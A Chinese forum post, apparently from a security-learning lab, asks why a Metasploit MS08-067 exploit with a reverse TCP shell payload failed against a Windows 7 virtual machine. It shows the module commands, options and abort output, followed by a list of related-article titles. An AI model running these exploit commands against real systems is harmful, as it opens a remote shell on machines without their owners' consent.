linux ms08 067漏洞,MS08067攻击实验失败的原因是什么?
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
靶机:虚拟机win7 x64 专业版 nat网络 IP:192.168.233.128(新安装)
攻击机:虚拟机Kali Linux nat网络 IP:192.168.233.129
靶机与虚拟机双向ping通,nmap检测靶机445端口开放
命令:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
set RHOST 192.168.233.128
set LHOST 192.168.233.129
最后检查配置:
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.233.128 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.233.129 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
确认无误,命令:
run
返回:
[*] Started reverse TCP handler on 192.168.233.129:4444
[*] 192.168.233.128:445 - Automatically detecting the target...
[*] 192.168.233.128:445 - Fingerprint: Windows 7 - - lang:Unknown
[*] 192.168.233.128:445 - We could not detect the language pack, defaulting to English
[-] 192.168.233.128:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
然后就没有然后了,这是怎么回事?靶机有问题?
linux ms08 067漏洞,MS08067攻击实验失败的原因是什么?相关推荐
- [翻译]现代Linux系统上的栈溢出攻击【转】
转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...
- 谷歌发现利用零日漏洞的攻击、黑客通过漏洞入侵红十字会|2月17日全球网络安全热点
安全资讯报告 新加坡将加强网络钓鱼诈骗后的安全措施 新加坡正在加强安全措施,以支持当地的银行和通信基础设施,其中包括短信服务提供商需要在发送消息之前检查注册表.预计银行还将开发"更通用&qu ...
- Metasploit上使用RPC方式复现一个Linux提权漏洞
序 学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...
- XSS漏洞自动化攻击工具XSSer
XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击 ...
- linux 鬼精灵漏洞,鬼精灵Grinch:比Bash破壳(shellshock)更严重的Linux漏洞
安全研究人员在Linux操作系统中发现了一个名为鬼精灵(Grinch)的漏洞,该漏洞存在于linux系统中,和Bash破壳(shellshock)漏洞一样可以在受害者机器上获得最高权限--Root. ...
- Alpine Linux:从漏洞发现到代码执行
本文讲的是Alpine Linux:从漏洞发现到代码执行, 我最近在Alpine Linux的软件包管理器中发现了两个关键的漏洞,分别是CVE-2017-9669和CVE-2017-9671,如果你正 ...
- Arch Linux 服务器,Arch Linux不适合当作服务器操作系统的四大原因
摘要 腾兴网为您分享:Arch Linux不适合当作服务器操作系统的四大原因,云闪付,一路捞,武魂传说,完美志愿等软件知识,以及重复文件清理软件,涂色本,安卓福利社,cc网易cc直播,德化教育管理公共 ...
- Snap 程序包管理器被爆Linux 提权漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Canonical 公司旗下产品 Snap 软件封装和部署系统中出现多个漏洞,其中最严重漏洞可被用于提权,获得root权限. Snaps 是自包 ...
- 异域linux内核漏洞,Linux内核再现漏洞!这次11年后才发现
原标题:Linux内核再现漏洞!这次11年后才发现 还记得上一次Linux内核出现大的漏洞是什么时候吗?2009年Linux内核出现严重安全漏洞,直到2014年才被发现,这个严重安全漏洞整整存在了5年 ...
- 黑客狂野利用零日漏洞:小米三星也中招,安卓手机最易受此漏洞的攻击?
零日漏洞的另一个启示,这次是在全球使用最广泛的移动操作系统Android中.黑客无处不在,知名网络安全专家,东方联盟创始人郭盛华还发现了Android 0day漏洞的狂野利用,这是臭名昭著的,因为它向 ...
最新文章
- 曝光!十万开发者喜爱的顶级当红讲师
- Repository模式(转载)
- transform与fit_transform的区别
- overlay 如何实现跨主机通信?- 每天5分钟玩转 Docker 容器技术(52)
- html5和极速模式,浅谈360浏览器6.0版本极速模式与兼容模式_蓝戒的博客
- int转为string类型方法
- 零基础学Python的几个经典例子
- 如何使用计算机实现fft,快速傅立叶变换(FFT)的计算机实现..doc
- 读EasyPR开发详解实践感想1
- java动态代理实现与原理详细分析(【转载】By--- Gonjan )
- python统计频数_python统计单词出现次数
- [STC单片机] STC32G单片机双CAN通信测试
- 简单的sql注入之2WP
- Machine Learning读书会·北京今日启动(第3期周爱民、张帆)
- git pull 时一直卡在Unpacking objects【待解决】
- bing每日壁纸客户端
- 【搞定Jvm面试】 Java 内存区域揭秘附常见面试题解析
- Web前端面试问题集锦
- 光纤跳线接口_光纤跳线有哪些接口?
- 计算机软考知识点,计算机软考《程序员》常考知识点总结